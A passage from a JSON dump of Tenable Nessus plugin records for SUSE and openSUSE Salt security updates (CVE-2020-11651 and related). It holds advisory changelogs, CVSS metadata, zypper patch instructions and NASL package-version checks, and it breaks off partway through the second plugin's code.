(SUSE-SU-2020:1973-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-18897", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-api", "p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-proxy", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-syndic", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2020-1973-1.NASL", "href": "https://www.tenable.com/plugins/nessus/138794", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1973-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138794);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-18897\", \"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"SUSE SLES15 Security Update : Salt (SUSE-SU-2020:1973-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update fixes the following issues :\n\nsalt :\n\nFix for TypeError in Tornado importer (bsc#1174165)\n\nRequire python3-distro only for TW (bsc#1173072)\n\nVarious virt backports from 3000.2\n\nAvoid traceback on debug logging for swarm module (bsc#1172075)\n\nAdd publish_batch to ClearFuncs exposed methods\n\nUpdate to salt version 3000 See release notes:\nhttps://docs.saltstack.com/en/latest/topics/releases/3000.html\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nTestsuite fix\n\nAdd option to enable/disable force refresh for zypper\n\nPython3.8 compatibility changes\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nRevert broken changes to slspath made on Salt 3000\n(saltstack/salt#56341) (bsc#1170104)\n\nReturns a the list of IPs filtered by the optional network list\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nDo not require vendored backports-abc (bsc#1170288)\n\nFix partition.mkpart to work without fstype (bsc#1169800)\n\nEnable building and installation for Fedora\n\nDisable python2 build on Tumbleweed We are removing the python2\ninterpreter from openSUSE (SLE16). As such disable salt building for\npython2 there.\n\nMore robust remote port detection\n\nSanitize grains loaded from roster_grains.json cache during\n'state.pkg'\n\nDo not make file.recurse state to fail when msgpack 0.5.4\n(bsc#1167437)\n\nBuild: Buildequire pkgconfig(systemd) instead of systemd\npkgconfig(systemd) is provided by systemd, so this is de-facto no\nchange. But inside the Open Build Service (OBS), the same symbol is\nalso provided by systemd-mini, which exists to shorten build-chains by\nonly enabling what other packages need to successfully build\n\nAdd new custom SUSE capability for saltutil state module\n\nFixes status attribute issue in aptpkg test\n\nMake setup.py script not to require setuptools greater than 9.1\n\nLoop: fix variable names for until_no_eval\n\nDrop conflictive module.run state patch (bsc#1167437)\n\nUpdate patches after rebase with upstream v3000 tag (bsc#1167437)\n\nFix some requirements issues depending on Python3 versions\n\nRemoves obsolete patch\n\nFix for low rpm_lowpkg unit test\n\nAdd python-singledispatch as dependency for python2-salt\n\nVirt._get_domain: don't raise an exception if there is no VM\n\nFix for temp folder definition in loader unit test\n\nAdds test for zypper abbreviation fix\n\nImproved storage pool or network handling\n\nBetter import cache handline\n\nMake 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python\n2\n\nFix regression in service states with reload argument\n\nFix integration test failure for test_mod_del_repo_multiline_values\n\nFix for unless requisite when pip is not installed\n\nFix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation\n\nFix tornado imports and missing _utils after rebasing patches\n\nRemoves unresolved merge conflict in yumpkg module\n\nUse full option name instead of undocumented abbreviation for zypper\n\nRequiring python3-distro only for openSUSE/SLE >= 15 and not for\nPython 2 builds\n\nAvoid possible user escalation upgrading salt-master (bsc#1157465)\n(CVE-2019-18897)\n\nFix unit tests failures in test_batch_async tests\n\nBatch Async: Handle exceptions, properly unregister and close\ninstances after running async batching to avoid CPU starvation of the\nMWorkers (bsc#1162327)\n\nRHEL/CentOS 8 uses platform-python instead of python3\n\nLoader: invalidate the import cachefor extra modules\n\nZypperpkg: filter patterns that start with dot (bsc#1171906)\n\nBatch mode now also correctly provides return value (bsc#1168340)\n\nAdd docker.logout to docker execution module (bsc#1165572)\n\nImprovements for chroot module\n\nAdd option to enable/disable force refresh for zypper\n\nPrevent sporious 'salt-api' stuck processes when managing SSH minions\nbecause of logging deadlock (bsc#1159284)\n\nAvoid segfault from 'salt-api' under certain conditions of heavy load\nmanaging SSH minions (bsc#1169604)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1157465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1162327\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1169800\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2019-18897/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11651/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2020-11652/\");\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201973-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6b40e28d\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1973=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1973=1\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-3000-5.78.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-3000-5.78.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:17:12", "description": "This update for salt contains the following fixes :\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n\n - Require python3-distro only for TW (bsc#1173072)\n\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/300 0.html\n\n - Add docker.logout to docker execution module.\n (bsc#1165572)\n\n - Add option to enable/disable force refresh for zypper.\n\n - Add publish_batch to ClearFuncs exposed methods.\n\n - Adds test for zypper abbreviation fix.\n\n - Avoid segfault from 'salt-api' under certain conditions of heavy load managing SSH minions. (bsc#1169604)\n\n - Avoid traceback on debug logging for swarm module.\n (bsc#1172075)\n\n - Batch mode now also correctly provides return value.\n (bsc#1168340)\n\n - Better import cache handline.\n\n - Do not make file.recurse state to fail when msgpack 0.5.4. (bsc#1167437)\n\n - Do not require vendored backports-abc. (bsc#1170288)\n\n - Fix errors from unit tests due NO_MOCK and NO_MOCK_REASON deprecation.\n\n - Fix for low rpm_lowpkg unit test.\n\n - Fix for temp folder definition in loader unit test.\n\n - Fix for unless requisite when pip is not installed.\n\n - Fix integration test failure for test_mod_del_repo_multiline_values.\n\n - Fix regression in service states with reload argument.\n\n - Fix tornado imports and missing _utils after rebasing patches.\n\n - Fix status attribute issue in aptpkg test.\n\n - Improved storage pool or network handling.\n\n - loop: fix variable names for until_no_eval.\n\n - Make 'salt.ext.tornado.gen' to use 'salt.ext.backports_abc' on Python 2.\n\n - Make setup.py script not to require setuptools greater than 9.1.\n\n - More robust remote port detection.\n\n - Prevent sporious 'salt-api' stuck processes when managing SSH minions. because of logging deadlock.\n (bsc#1159284)\n\n - Python3.8 compatibility changes.\n\n - Removes unresolved merge conflict in yumpkg module.\n\n - Returns a the list of IPs filtered by the optional network list.\n\n - Revert broken changes to slspath made on Salt 3000 (saltstack/salt#56341). (bsc#1170104)\n\n - Sanitize grains loaded from roster_grains.json cache during 'state.pkg'.\n\n - Various virt backports from 3000.2.\n\n - zypperpkg: filter patterns that start with dot.\n (bsc#1171906)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-28T00:00:00", "type": "nessus", "title": "openSUSE Security Update : salt (openSUSE-2020-1074)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15750", "CVE-2018-15751", "CVE-2020-11651", "CVE-2020-11652"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:python2-salt", "p-cpe:/a:novell:opensuse:python3-salt", "p-cpe:/a:novell:opensuse:salt", "p-cpe:/a:novell:opensuse:salt-api", "p-cpe:/a:novell:opensuse:salt-bash-completion", "p-cpe:/a:novell:opensuse:salt-cloud", "p-cpe:/a:novell:opensuse:salt-fish-completion", "p-cpe:/a:novell:opensuse:salt-master", "p-cpe:/a:novell:opensuse:salt-minion", "p-cpe:/a:novell:opensuse:salt-proxy", "p-cpe:/a:novell:opensuse:salt-ssh", "p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration", "p-cpe:/a:novell:opensuse:salt-syndic", "p-cpe:/a:novell:opensuse:salt-zsh-completion", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-1074.NASL", "href": "https://www.tenable.com/plugins/nessus/139012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1074.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139012);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2018-15750\",\n \"CVE-2018-15751\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"openSUSE Security Update : salt (openSUSE-2020-1074)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for salt contains the following fixes :\n\n - Fix for TypeError in Tornado importer (bsc#1174165)\n\n - Require python3-distro only for TW (bsc#1173072)\n\n - Update to Salt version 3000: See release notes:\n https://docs.saltstack.com/en/latest/topics/releases/300\n 0.html\n\n - Add docker.logout to docker execution module.\n (bsc#1165572)\n\n - Add option to enable/disable force refresh for zypper.\n\n - Add publish_batch to ClearFuncs exposed methods.\n\n - Adds test for zypper abbreviation fix.\n\n - Avoid segfault from 'salt-api' under certain conditions\n of heavy load managing SSH minions. (bsc#1169604)\n\n - Avoid traceback on debug logging for swarm module.\n (bsc#1172075)\n\n - Batch mode now also correctly provides return value.\n (bsc#1168340)\n\n - Better import cache handline.\n\n - Do not make file.recurse state to fail when msgpack\n 0.5.4. (bsc#1167437)\n\n - Do not require vendored backports-abc. (bsc#1170288)\n\n - Fix errors from unit tests due NO_MOCK and\n NO_MOCK_REASON deprecation.\n\n - Fix for low rpm_lowpkg unit test.\n\n - Fix for temp folder definition in loader unit test.\n\n - Fix for unless requisite when pip is not installed.\n\n - Fix integration test failure for\n test_mod_del_repo_multiline_values.\n\n - Fix regression in service states with reload argument.\n\n - Fix tornado imports and missing _utils after rebasing\n patches.\n\n - Fix status attribute issue in aptpkg test.\n\n - Improved storage pool or network handling.\n\n - loop: fix variable names for until_no_eval.\n\n - Make 'salt.ext.tornado.gen' to use\n 'salt.ext.backports_abc' on Python 2.\n\n - Make setup.py script not to require setuptools greater\n than 9.1.\n\n - More robust remote port detection.\n\n - Prevent sporious 'salt-api' stuck processes when\n managing SSH minions. because of logging deadlock.\n (bsc#1159284)\n\n - Python3.8 compatibility changes.\n\n - Removes unresolved merge conflict in yumpkg module.\n\n - Returns a the list of IPs filtered by the optional\n network list.\n\n - Revert broken changes to slspath made on Salt 3000\n (saltstack/salt#56341). (bsc#1170104)\n\n - Sanitize grains loaded from roster_grains.json cache\n during 'state.pkg'.\n\n - Various virt backports from 3000.2.\n\n - zypperpkg: filter patterns that start with dot.\n (bsc#1171906)\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1159284\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1165572\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1167437\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1168340\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1169604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1170288\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1171906\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1172075\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1173072\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1174165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.saltstack.com/en/latest/topics/releases/3000.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected salt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-bash-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-fish-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:salt-zsh-completion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python2-salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"python3-salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-api-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-bash-completion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-cloud-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-fish-completion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-master-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-minion-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-proxy-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-ssh-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-standalone-formulas-configuration-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-syndic-3000-lp151.5.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"salt-zsh-completion-3000-lp151.5.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else 